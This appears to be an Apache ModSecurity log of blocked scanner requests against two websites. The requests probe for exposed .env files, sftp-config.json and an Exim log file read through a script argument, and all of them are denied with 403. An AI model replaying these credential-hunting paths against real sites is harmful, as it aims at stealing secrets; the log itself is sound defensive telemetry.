[Mon May 11 12:32:11.882082 2026] [security2:error] [pid 1254179:tid 1254192] [client 185.177.72.9:21806] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /billing/.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/billing/.env~"] [unique_id "agGwK2S6k_SCYd1AVZq9vAAAAQs"]
[Mon May 11 12:32:11.882392 2026] [security2:error] [pid 1254179:tid 1254192] [client 185.177.72.9:21806] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/billing/.env~"] [unique_id "agGwK2S6k_SCYd1AVZq9vAAAAQs"]
[Mon May 11 12:32:13.086036 2026] [security2:error] [pid 1254179:tid 1254192] [client 185.177.72.9:21806] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwK2S6k_SCYd1AVZq9vAAAAQs"]
[Mon May 11 12:32:13.111834 2026] [security2:error] [pid 1254328:tid 1254333] [client 185.177.72.9:38482] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bitbucket/.env.backup.~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/bitbucket/.env.backup.~"] [unique_id "agGwLURdw2n9wv6Ai48WHAAAAII"]
[Mon May 11 12:32:13.112056 2026] [security2:error] [pid 1254328:tid 1254333] [client 185.177.72.9:38482] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/bitbucket/.env.backup.~"] [unique_id "agGwLURdw2n9wv6Ai48WHAAAAII"]
[Mon May 11 12:32:14.329971 2026] [security2:error] [pid 1254328:tid 1254333] [client 185.177.72.9:38482] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwLURdw2n9wv6Ai48WHAAAAII"]
[Mon May 11 12:32:14.356290 2026] [security2:error] [pid 1254133:tid 1254140] [client 185.177.72.9:38498] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bitbucket/.env.backup.~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/bitbucket/.env.backup.~"] [unique_id "agGwLhjZymfuKpjWXeiLLwAAAMQ"]
[Mon May 11 12:32:14.356504 2026] [security2:error] [pid 1254133:tid 1254140] [client 185.177.72.9:38498] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/bitbucket/.env.backup.~"] [unique_id "agGwLhjZymfuKpjWXeiLLwAAAMQ"]
[Mon May 11 12:32:15.593067 2026] [security2:error] [pid 1254133:tid 1254140] [client 185.177.72.9:38498] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwLhjZymfuKpjWXeiLLwAAAMQ"]
[Mon May 11 12:32:17.880801 2026] [security2:error] [pid 1256241:tid 1256258] [client 216.73.216.110:43512] ModSecurity: Warning. Matched phrase "var/log/exim_paniclog" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: var/log/exim_paniclog found within ARGS:filesrc: /var/log/exim_paniclog-20260426.gz"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGwMZkIEwRJMyDaV55cpQAAAUw"]
[Mon May 11 12:32:17.881501 2026] [security2:error] [pid 1256241:tid 1256258] [client 216.73.216.110:43512] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGwMZkIEwRJMyDaV55cpQAAAUw"]
[Mon May 11 12:32:17.978518 2026] [security2:error] [pid 1256241:tid 1256258] [client 216.73.216.110:43512] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwMZkIEwRJMyDaV55cpQAAAUw"]
[Mon May 11 12:32:20.734116 2026] [security2:error] [pid 1254133:tid 1254151] [client 185.177.72.9:38554] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /data/.env.docker~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/data/.env.docker~"] [unique_id "agGwNBjZymfuKpjWXeiLPwAAAM8"]
[Mon May 11 12:32:20.734766 2026] [security2:error] [pid 1254133:tid 1254151] [client 185.177.72.9:38554] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/data/.env.docker~"] [unique_id "agGwNBjZymfuKpjWXeiLPwAAAM8"]
[Mon May 11 12:32:21.920723 2026] [security2:error] [pid 1254133:tid 1254151] [client 185.177.72.9:38554] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwNBjZymfuKpjWXeiLPwAAAM8"]
[Mon May 11 12:32:21.945041 2026] [security2:error] [pid 1254179:tid 1254205] [client 185.177.72.9:38558] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /data/.env.docker~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/data/.env.docker~"] [unique_id "agGwNWS6k_SCYd1AVZq91AAAARg"]
[Mon May 11 12:32:21.945620 2026] [security2:error] [pid 1254179:tid 1254205] [client 185.177.72.9:38558] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/data/.env.docker~"] [unique_id "agGwNWS6k_SCYd1AVZq91AAAARg"]
[Mon May 11 12:32:23.146825 2026] [security2:error] [pid 1254179:tid 1254205] [client 185.177.72.9:38558] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwNWS6k_SCYd1AVZq91AAAARg"]
[Mon May 11 12:32:23.172452 2026] [security2:error] [pid 1254179:tid 1254200] [client 185.177.72.9:1574] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /db/.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/db/.env~"] [unique_id "agGwN2S6k_SCYd1AVZq91gAAARM"]
[Mon May 11 12:32:23.172662 2026] [security2:error] [pid 1254179:tid 1254200] [client 185.177.72.9:1574] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/db/.env~"] [unique_id "agGwN2S6k_SCYd1AVZq91gAAARM"]
[Mon May 11 12:32:24.350068 2026] [security2:error] [pid 1254179:tid 1254200] [client 185.177.72.9:1574] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwN2S6k_SCYd1AVZq91gAAARM"]
[Mon May 11 12:32:24.376295 2026] [security2:error] [pid 1254242:tid 1254266] [client 185.177.72.9:1580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /db/.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/db/.env~"] [unique_id "agGwOL4KNmD_mZ_vlf9H6gAAAFU"]
[Mon May 11 12:32:24.376502 2026] [security2:error] [pid 1254242:tid 1254266] [client 185.177.72.9:1580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/db/.env~"] [unique_id "agGwOL4KNmD_mZ_vlf9H6gAAAFU"]
[Mon May 11 12:32:25.592256 2026] [security2:error] [pid 1254242:tid 1254266] [client 185.177.72.9:1580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwOL4KNmD_mZ_vlf9H6gAAAFU"]
[Mon May 11 12:32:31.479199 2026] [security2:error] [pid 1254133:tid 1254153] [client 185.177.72.9:1650] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /dotnet/sftp-config.json.~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/dotnet/sftp-config.json.~"] [unique_id "agGwPxjZymfuKpjWXeiLSwAAANE"]
[Mon May 11 12:32:31.482560 2026] [security2:error] [pid 1254133:tid 1254153] [client 185.177.72.9:1650] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/dotnet/sftp-config.json.~"] [unique_id "agGwPxjZymfuKpjWXeiLSwAAANE"]
[Mon May 11 12:32:32.639066 2026] [security2:error] [pid 1254133:tid 1254153] [client 185.177.72.9:1650] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwPxjZymfuKpjWXeiLSwAAANE"]
[Mon May 11 12:32:32.661229 2026] [security2:error] [pid 1254212:tid 1254214] [client 185.177.72.9:1662] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /dotnet/sftp-config.json.~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/dotnet/sftp-config.json.~"] [unique_id "agGwQEYQeUtAPynIs6xnWAAAAAA"]
[Mon May 11 12:32:32.661455 2026] [security2:error] [pid 1254212:tid 1254214] [client 185.177.72.9:1662] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/dotnet/sftp-config.json.~"] [unique_id "agGwQEYQeUtAPynIs6xnWAAAAAA"]
[Mon May 11 12:32:33.925960 2026] [security2:error] [pid 1254212:tid 1254214] [client 185.177.72.9:1662] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwQEYQeUtAPynIs6xnWAAAAAA"]
[Mon May 11 12:32:33.951556 2026] [security2:error] [pid 1256241:tid 1256255] [client 185.177.72.9:53004] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /fly/.env.dist~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/fly/.env.dist~"] [unique_id "agGwQZkIEwRJMyDaV55cwwAAAUk"]
[Mon May 11 12:32:33.951767 2026] [security2:error] [pid 1256241:tid 1256255] [client 185.177.72.9:53004] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/fly/.env.dist~"] [unique_id "agGwQZkIEwRJMyDaV55cwwAAAUk"]
[Mon May 11 12:32:35.143930 2026] [security2:error] [pid 1256241:tid 1256255] [client 185.177.72.9:53004] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwQZkIEwRJMyDaV55cwwAAAUk"]
[Mon May 11 12:32:35.169824 2026] [security2:error] [pid 1254133:tid 1254136] [client 185.177.72.9:53016] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /fly/.env.dist~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/fly/.env.dist~"] [unique_id "agGwQxjZymfuKpjWXeiLTgAAAME"]
[Mon May 11 12:32:35.170033 2026] [security2:error] [pid 1254133:tid 1254136] [client 185.177.72.9:53016] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/fly/.env.dist~"] [unique_id "agGwQxjZymfuKpjWXeiLTgAAAME"]
[Mon May 11 12:32:36.411735 2026] [security2:error] [pid 1254133:tid 1254136] [client 185.177.72.9:53016] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwQxjZymfuKpjWXeiLTgAAAME"]
[Mon May 11 12:32:52.464089 2026] [security2:error] [pid 1256241:tid 1256253] [client 185.177.72.9:11306] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /postman/.env.bak.~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/postman/.env.bak.~"] [unique_id "agGwVJkIEwRJMyDaV55c6AAAAUc"]
[Mon May 11 12:32:52.465606 2026] [security2:error] [pid 1256241:tid 1256253] [client 185.177.72.9:11306] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/postman/.env.bak.~"] [unique_id "agGwVJkIEwRJMyDaV55c6AAAAUc"]
[Mon May 11 12:32:53.664772 2026] [security2:error] [pid 1256241:tid 1256253] [client 185.177.72.9:11306] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwVJkIEwRJMyDaV55c6AAAAUc"]
